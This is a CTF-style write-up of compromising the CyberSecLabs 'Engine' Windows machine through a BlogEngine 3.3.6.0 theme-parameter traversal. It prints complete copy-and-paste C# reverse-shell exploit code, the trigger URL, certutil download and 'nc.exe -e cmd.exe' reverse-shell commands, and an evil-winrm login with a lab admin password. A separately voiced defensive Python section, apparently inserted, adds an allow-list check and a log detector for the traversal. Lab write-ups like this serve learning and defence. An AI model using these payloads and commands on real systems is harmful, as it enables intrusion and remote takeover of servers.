CyberSecLabs-Engine

Software Sinner
5 min read · Aug 6, 2020


This is my 8th write-up, and I will be discussing my experience with the machine “Engine” from CyberSecLabs. CyberSecLabs is a great platform for people who are new to penetration testing and want to boost their skills to take on the OSCP. This was a beginner-level Windows machine, and I found it pretty easy. A BlogEngine exploit caused by an unchecked theme parameter grants a reverse shell on the server; running a privilege escalation script then exposes Autologon admin credentials.

Step 1: Enumeration

I started off with an Nmap scan on this machine and decided there was no need for a second scan type. The scan used default scripts (-sC) and version detection (-sV).

I always like to start from top to bottom, or usually start with ports that stick out. Luckily for me, port 80 was first on the list, letting me know that this thing is running a web server. Visiting http://172.31.1.16 in my browser brought me to a default IIS page.

Not much information was provided by this default page aside from it running Microsoft IIS. I decided to run a directory-busting tool to discover other directories exposed on the server.

dirb

/blog was the most obvious for me, which landed on this guy Alex’s blog page. I viewed the page source and found that this thing was running an exploitable version of BlogEngine, along with a login button bringing me to an admin login page.

Viewing the page source
Login button

If I had a dollar for every time an admin login page used admin:admin for the username and password, I would be richer than Elon Musk. Anyway, yeah, this worked. How shocking.

admin page

Going back to that version I found by viewing the page source, I did some googling and found an exploit available for BlogEngine 3.3.6.0, caused by an unchecked theme parameter.

At first I was having a ton of trouble getting this exploit to work, only to find out that pasting it directly into vim messed up the code. Always double-check your code, ladies and gentlemen. Once you have it pasted into your favorite text editor, you need to replace the IP and port in the code with your IP and desired port or this will not work. Also, it has to be named and saved as PostView.ascx.

Example:

Replace that with your IP and desired port

The full exploit code:

in case you wanted to copy and paste it ;)

<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>

<script runat="server">
    static System.IO.StreamWriter streamWriter;

    // Runs when BlogEngine loads this control as the theme's PostView:
    // it connects back to the listener and pipes cmd.exe over that socket.
    protected override void OnLoad(EventArgs e) {
        base.OnLoad(e);

        // Replace the IP and port below with your listener's, as described above.
        using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.10.10.20", 4445)) {
            using(System.IO.Stream stream = client.GetStream()) {
                using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
                    streamWriter = new System.IO.StreamWriter(stream);

                    StringBuilder strInput = new StringBuilder();

                    // cmd.exe with all three standard streams redirected, so its
                    // input comes from the socket and its output goes back out.
                    System.Diagnostics.Process p = new System.Diagnostics.Process();
                    p.StartInfo.FileName = "cmd.exe";
                    p.StartInfo.CreateNoWindow = true;
                    p.StartInfo.UseShellExecute = false;
                    p.StartInfo.RedirectStandardOutput = true;
                    p.StartInfo.RedirectStandardInput = true;
                    p.StartInfo.RedirectStandardError = true;
                    p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
                    p.Start();
                    p.BeginOutputReadLine();

                    // Forward each line received from the listener to cmd.exe.
                    while(true) {
                        strInput.Append(rdr.ReadLine());
                        p.StandardInput.WriteLine(strInput);
                        strInput.Remove(0, strInput.Length);
                    }
                }
            }
        }
    }

    // Called for every line cmd.exe writes; relays it back over the socket.
    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
        StringBuilder strOutput = new StringBuilder();

        if (!String.IsNullOrEmpty(outLine.Data)) {
            try {
                strOutput.Append(outLine.Data);
                streamWriter.WriteLine(strOutput);
                streamWriter.Flush();
            } catch (Exception err) { }
        }
    }
</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>

Okay, so I followed these exact steps from the exploit after pasting the code into my text editor and replacing the IP and port:

First, set up a netcat listener on your machine to grab the connection.

On my Kali Machine:

sudo nc -lvp 4444
  • Navigate to the Content menu.
  • A listing of posts should be shown on this screen. Click New to add one.
  • In the toolbar located above the post body, there should be a number of icons. There should be one that looks like an open file, called File Manager. Click this icon.
  • Here, simply upload the edited exploit PostView.ascx file.
  • Then visit http://172.31.1.16/blog/?theme=../../App_Data/files to trigger the reverse connection to your netcat listener.
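The whole chain hinges on the theme parameter being used as a path without validation. As an added defender-side example (not part of this write-up or of BlogEngine's code), here is the check the parameter should have been reduced to, plus a detector that runs the same check over IIS W3C log lines. The log lines, the field layout and the client IPs are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed IIS W3C sample (not from the write-up); the #Fields line gives the column order.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2020-08-06 10:15:01 172.31.1.16 GET /blog/ theme=Standard 80 - 10.10.10.20 Mozilla/5.0 200
2020-08-06 10:15:40 172.31.1.16 GET /blog/ theme=..%2F..%2FApp_Data%2Ffiles 80 - 10.10.10.20 Mozilla/5.0 200
2020-08-06 10:16:02 172.31.1.16 GET /blog/ theme=%252e%252e%2fApp_Data%2ffiles 80 - 10.10.10.30 curl/7.68.0 200
2020-08-06 10:16:30 172.31.1.16 GET /blog/post.aspx id=42 80 - 10.10.10.40 Mozilla/5.0 200
"""

# A theme is one plain directory name: no separators, no dots, no drive letters.
THEME_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")


def fully_decode(value, rounds=3):
    """URL-decode until the value stops changing, so double-encoded traversal (%252e) is caught too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_safe_theme(theme):
    """Allow-list check: '../', '..\\' and encoded variants all fail this."""
    return THEME_NAME.fullmatch(theme) is not None


def parse_iis(text):
    """Yield one dict per W3C log record, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif fields and line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))


def theme_traversal_findings(text):
    """Return (client ip, uri stem, decoded theme) for every request whose theme fails the allow-list."""
    findings = []
    for rec in parse_iis(text):
        query = parse_qs(rec.get("cs-uri-query", ""))  # parse_qs performs the first decode
        for raw in query.get("theme", []):
            theme = fully_decode(raw)
            if not is_safe_theme(theme):
                findings.append((rec["c-ip"], rec["cs-uri-stem"], theme))
    return findings
```

Running `theme_traversal_findings(SAMPLE_LOG)` flags the two traversal requests and leaves the legitimate `theme=Standard` and unrelated requests alone.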

I got the low-level shell from following those steps.

Reverse shell connection

This shell sucked, so I pushed an nc.exe file onto the exploited server into a directory that was accepting incoming files.

On my Kali Machine:

cd /usr/share/windows-binaries
sudo python -m SimpleHTTPServer 80

I opened another Kali terminal window and set up another netcat listener, on a different port this time:

sudo nc -lvp 6666

On the Exploited Windows box:

cd C:\
mkdir sinner
cd sinner
certutil.exe -urlcache -split -f "http://youriphere:80/nc.exe"
nc.exe -e cmd.exe youriphere 6666

Now I got a better shell… woooo!

I browsed around for a while and did not find anything interesting, so I pushed my favorite privilege escalation file, winPEAS.exe, onto the server using the same method as for nc.exe: kill the Python simple server and start it again in the directory where I am serving the winPEAS file.

After pushing it onto the server and running winPEAS.exe, the admin credentials were discovered via Autologon.

Owen Wilson knows the deal

I then connected back to the server with my favorite tool, evil-winrm, using the credentials we found.

sudo evil-winrm -i 172.31.1.16 -u Administrator -p PzCEKhvj6gQMK7kA

Well, you can now grab both flags since you are full admin.
